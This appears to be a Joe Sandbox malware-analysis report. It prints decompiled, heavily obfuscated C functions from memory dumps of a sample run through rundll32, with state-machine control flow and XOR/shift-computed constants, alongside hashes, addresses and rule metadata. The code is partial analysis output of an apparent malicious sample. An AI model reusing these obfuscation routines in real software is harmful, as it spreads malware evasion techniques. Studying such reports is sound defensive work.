                                                                                                                                                            0x0038e0d0
                                                                                                                                                            0x0038e0d8
                                                                                                                                                            0x0038e0d8
                                                                                                                                                            0x0038e0e6
                                                                                                                                                            0x0038e176
                                                                                                                                                            0x0038e17b
                                                                                                                                                            0x0038e17e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e0e8
                                                                                                                                                            0x0038e0ee
                                                                                                                                                            0x0038e153
                                                                                                                                                            0x0038e155
                                                                                                                                                            0x0038e158
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e0f0
                                                                                                                                                            0x0038e0f6
                                                                                                                                                            0x0038e1bd
                                                                                                                                                            0x0038e0fc
                                                                                                                                                            0x0038e102
                                                                                                                                                            0x0038e13c
                                                                                                                                                            0x0038e13d
                                                                                                                                                            0x0038e13e
                                                                                                                                                            0x0038e143
                                                                                                                                                            0x0038e147
                                                                                                                                                            0x0038e149
                                                                                                                                                            0x0038e14b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e14b
                                                                                                                                                            0x0038e104
                                                                                                                                                            0x0038e106
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e10c
                                                                                                                                                            0x0038e11e
                                                                                                                                                            0x0038e123
                                                                                                                                                            0x0038e126
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e126
                                                                                                                                                            0x0038e106
                                                                                                                                                            0x0038e102
                                                                                                                                                            0x0038e0f6
                                                                                                                                                            0x0038e0ee
                                                                                                                                                            0x0038e1c5
                                                                                                                                                            0x0038e1c7
                                                                                                                                                            0x0038e1cc
                                                                                                                                                            0x0038e1cc
                                                                                                                                                            0x0038e1d3
                                                                                                                                                            0x0038e1d3
                                                                                                                                                            0x0038e18f
                                                                                                                                                            0x0038e192
                                                                                                                                                            0x0038e197
                                                                                                                                                            0x0038e197
                                                                                                                                                            0x0038e197
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: d<$g$Wp
                                                                                                                                                            • API String ID: 0-355099142
                                                                                                                                                            • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                                            • Instruction ID: bf0f6f14cccd061bba9ac59937ab9221d3572fa190dbb2e81748d5447c58c068
                                                                                                                                                            • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                                            • Instruction Fuzzy Hash: 277141B11093419FC769DF61C48982BBBF1FBC9748F10895DF29A96220D3B68A09CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00371A56 Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E00371A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E0038D97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E00373DBC( &_v44, _t101, _v72, _v48, _v76);
							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E00372A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}






















                                                                                                                                                            0x00371a5d
                                                                                                                                                            0x00371a61
                                                                                                                                                            0x00371a63
                                                                                                                                                            0x00371a65
                                                                                                                                                            0x00371a69
                                                                                                                                                            0x00371a6a
                                                                                                                                                            0x00371a6b
                                                                                                                                                            0x00371a70
                                                                                                                                                            0x00371a78
                                                                                                                                                            0x00371a7b
                                                                                                                                                            0x00371a85
                                                                                                                                                            0x00371a8d
                                                                                                                                                            0x00371a8f
                                                                                                                                                            0x00371a97
                                                                                                                                                            0x00371a9c
                                                                                                                                                            0x00371aa4
                                                                                                                                                            0x00371aac
                                                                                                                                                            0x00371ab4
                                                                                                                                                            0x00371abc
                                                                                                                                                            0x00371ac4
                                                                                                                                                            0x00371ad3
                                                                                                                                                            0x00371ad4
                                                                                                                                                            0x00371ad8
                                                                                                                                                            0x00371ae0
                                                                                                                                                            0x00371ae8
                                                                                                                                                            0x00371af5
                                                                                                                                                            0x00371af9
                                                                                                                                                            0x00371b01
                                                                                                                                                            0x00371b06
                                                                                                                                                            0x00371b0e
                                                                                                                                                            0x00371b16
                                                                                                                                                            0x00371b1e
                                                                                                                                                            0x00371b26
                                                                                                                                                            0x00371b2e
                                                                                                                                                            0x00371b38
                                                                                                                                                            0x00371b3c
                                                                                                                                                            0x00371b44
                                                                                                                                                            0x00371b4c
                                                                                                                                                            0x00371b51
                                                                                                                                                            0x00371b59
                                                                                                                                                            0x00371b61
                                                                                                                                                            0x00371b69
                                                                                                                                                            0x00371b6e
                                                                                                                                                            0x00371b72
                                                                                                                                                            0x00371b7d
                                                                                                                                                            0x00371b81
                                                                                                                                                            0x00371b89
                                                                                                                                                            0x00371b91
                                                                                                                                                            0x00371b96
                                                                                                                                                            0x00371b9e
                                                                                                                                                            0x00371ba6
                                                                                                                                                            0x00371bb0
                                                                                                                                                            0x00371c36
                                                                                                                                                            0x00371c38
                                                                                                                                                            0x00371bb2
                                                                                                                                                            0x00371bb8
                                                                                                                                                            0x00371bf9
                                                                                                                                                            0x00371bfe
                                                                                                                                                            0x00371c01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00371bba
                                                                                                                                                            0x00371bc0
                                                                                                                                                            0x00371c0d
                                                                                                                                                            0x00371c0d
                                                                                                                                                            0x00371c13
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00371c15
                                                                                                                                                            0x00371bc2
                                                                                                                                                            0x00371bd7
                                                                                                                                                            0x00371bdc
                                                                                                                                                            0x00371be1
                                                                                                                                                            0x00371be3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00371be3
                                                                                                                                                            0x00371be1
                                                                                                                                                            0x00371bc0
                                                                                                                                                            0x00371bb8
                                                                                                                                                            0x00371c44
                                                                                                                                                            0x00371c44
                                                                                                                                                            0x00371c08
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %#O$DAZ$DAZ
                                                                                                                                                            • API String ID: 0-2081751441
                                                                                                                                                            • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                                            • Instruction ID: 765077a1515b393464920d312dcecc0e12a032b51ac99d514138d642179c89ad
                                                                                                                                                            • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                                            • Instruction Fuzzy Hash: D45167725083069FC76ACF25D98681FBBE1FBD8708F504A1DF58A96220D375CA098F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00390C14 Relevance: 3.9, Strings: 3, Instructions: 113COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00390C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E0038C2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E0038C2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E0037474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}





















                                                                                                                                                            0x00390c14
                                                                                                                                                            0x00390c1b
                                                                                                                                                            0x00390c1d
                                                                                                                                                            0x00390c27
                                                                                                                                                            0x00390c2f
                                                                                                                                                            0x00390c34
                                                                                                                                                            0x00390c3c
                                                                                                                                                            0x00390c44
                                                                                                                                                            0x00390c49
                                                                                                                                                            0x00390c51
                                                                                                                                                            0x00390c56
                                                                                                                                                            0x00390c5e
                                                                                                                                                            0x00390c66
                                                                                                                                                            0x00390c6e
                                                                                                                                                            0x00390c76
                                                                                                                                                            0x00390c7e
                                                                                                                                                            0x00390c86
                                                                                                                                                            0x00390c8e
                                                                                                                                                            0x00390c96
                                                                                                                                                            0x00390c9e
                                                                                                                                                            0x00390ca6
                                                                                                                                                            0x00390cab
                                                                                                                                                            0x00390cb8
                                                                                                                                                            0x00390cbc
                                                                                                                                                            0x00390cc4
                                                                                                                                                            0x00390cc6
                                                                                                                                                            0x00390cce
                                                                                                                                                            0x00390cd3
                                                                                                                                                            0x00390ce7
                                                                                                                                                            0x00390ce8
                                                                                                                                                            0x00390cec
                                                                                                                                                            0x00390cf4
                                                                                                                                                            0x00390cfc
                                                                                                                                                            0x00390d04
                                                                                                                                                            0x00390d12
                                                                                                                                                            0x00390d16
                                                                                                                                                            0x00390d1e
                                                                                                                                                            0x00390d26
                                                                                                                                                            0x00390d2e
                                                                                                                                                            0x00390d3b
                                                                                                                                                            0x00390d3f
                                                                                                                                                            0x00390d47
                                                                                                                                                            0x00390d4f
                                                                                                                                                            0x00390d57
                                                                                                                                                            0x00390d5f
                                                                                                                                                            0x00390d67
                                                                                                                                                            0x00390d6f
                                                                                                                                                            0x00390d77
                                                                                                                                                            0x00390d7f
                                                                                                                                                            0x00390d87
                                                                                                                                                            0x00390d94
                                                                                                                                                            0x00390d98
                                                                                                                                                            0x00390da0
                                                                                                                                                            0x00390da8
                                                                                                                                                            0x00390da8
                                                                                                                                                            0x00390db6
                                                                                                                                                            0x00390e2e
                                                                                                                                                            0x00390db8
                                                                                                                                                            0x00390dbe
                                                                                                                                                            0x00390df2
                                                                                                                                                            0x00390df6
                                                                                                                                                            0x00390dfb
                                                                                                                                                            0x00390dfe
                                                                                                                                                            0x00390e03
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00390dc0
                                                                                                                                                            0x00390dc2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00390dc4
                                                                                                                                                            0x00390dd0
                                                                                                                                                            0x00390dd1
                                                                                                                                                            0x00390dd2
                                                                                                                                                            0x00390dd7
                                                                                                                                                            0x00390dda
                                                                                                                                                            0x00390ddf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00390ddf
                                                                                                                                                            0x00390dc2
                                                                                                                                                            0x00390dbe
                                                                                                                                                            0x00390e30
                                                                                                                                                            0x00390e39
                                                                                                                                                            0x00390e39
                                                                                                                                                            0x00390e07
                                                                                                                                                            0x00390e09
                                                                                                                                                            0x00390e09
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 9^xu$fj$im
                                                                                                                                                            • API String ID: 0-3261451082
                                                                                                                                                            • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                                            • Instruction ID: 956fa564d83334b3a3dae636c7bd71d8797197f934438a187512832dec382891
                                                                                                                                                            • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                                            • Instruction Fuzzy Hash: 405146B28183429FC788CF25D48540BBBE0BFD8368F511A1DF499A6260D3B4CA49CF97
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00386C49 Relevance: 3.9, Strings: 3, Instructions: 104COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E00386C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E00379D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E00386637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E00374B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}























                                                                                                                                                            0x00386c55
                                                                                                                                                            0x00386c58
                                                                                                                                                            0x00386c5b
                                                                                                                                                            0x00386c5e
                                                                                                                                                            0x00386c5f
                                                                                                                                                            0x00386c60
                                                                                                                                                            0x00386c65
                                                                                                                                                            0x00386c6e
                                                                                                                                                            0x00386c75
                                                                                                                                                            0x00386c78
                                                                                                                                                            0x00386c7f
                                                                                                                                                            0x00386c81
                                                                                                                                                            0x00386c8d
                                                                                                                                                            0x00386c99
                                                                                                                                                            0x00386ca4
                                                                                                                                                            0x00386ca7
                                                                                                                                                            0x00386cae
                                                                                                                                                            0x00386cb5
                                                                                                                                                            0x00386cb8
                                                                                                                                                            0x00386cbf
                                                                                                                                                            0x00386cc6
                                                                                                                                                            0x00386ccd
                                                                                                                                                            0x00386cd1
                                                                                                                                                            0x00386cd8
                                                                                                                                                            0x00386cdf
                                                                                                                                                            0x00386ce3
                                                                                                                                                            0x00386cea
                                                                                                                                                            0x00386cf1
                                                                                                                                                            0x00386cf8
                                                                                                                                                            0x00386cff
                                                                                                                                                            0x00386d06
                                                                                                                                                            0x00386d0d
                                                                                                                                                            0x00386d14
                                                                                                                                                            0x00386d18
                                                                                                                                                            0x00386d1f
                                                                                                                                                            0x00386d26
                                                                                                                                                            0x00386d2d
                                                                                                                                                            0x00386d34
                                                                                                                                                            0x00386d3b
                                                                                                                                                            0x00386d42
                                                                                                                                                            0x00386d49
                                                                                                                                                            0x00386d4d
                                                                                                                                                            0x00386d54
                                                                                                                                                            0x00386d5b
                                                                                                                                                            0x00386d63
                                                                                                                                                            0x00386d66
                                                                                                                                                            0x00386d6d
                                                                                                                                                            0x00386d74
                                                                                                                                                            0x00386d7b
                                                                                                                                                            0x00386d7f
                                                                                                                                                            0x00386d86
                                                                                                                                                            0x00386d86
                                                                                                                                                            0x00386d8c
                                                                                                                                                            0x00386dcd
                                                                                                                                                            0x00386dd2
                                                                                                                                                            0x00386dd5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386dd5
                                                                                                                                                            0x00386d90
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386db0
                                                                                                                                                            0x00386de5
                                                                                                                                                            0x00386dec
                                                                                                                                                            0x00386dee
                                                                                                                                                            0x00386dee
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %t$DL&$r}5
                                                                                                                                                            • API String ID: 0-2337153543
                                                                                                                                                            • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                                            • Instruction ID: 479a0a713fb7e408edc60f1d9d0f903078bb8c4f671bcae23c4e3e75eac81249
                                                                                                                                                            • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                                            • Instruction Fuzzy Hash: DF411271D0020EEBCF1ADFE1D94A8EEBBB1FB48318F208198D51176260D3B54A59CFA5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                                                              • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                                                              • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1958600898-0
                                                                                                                                                            • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                                            • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                                                            • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                                            • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00381889 Relevance: 2.8, Strings: 2, Instructions: 278COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E00381889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
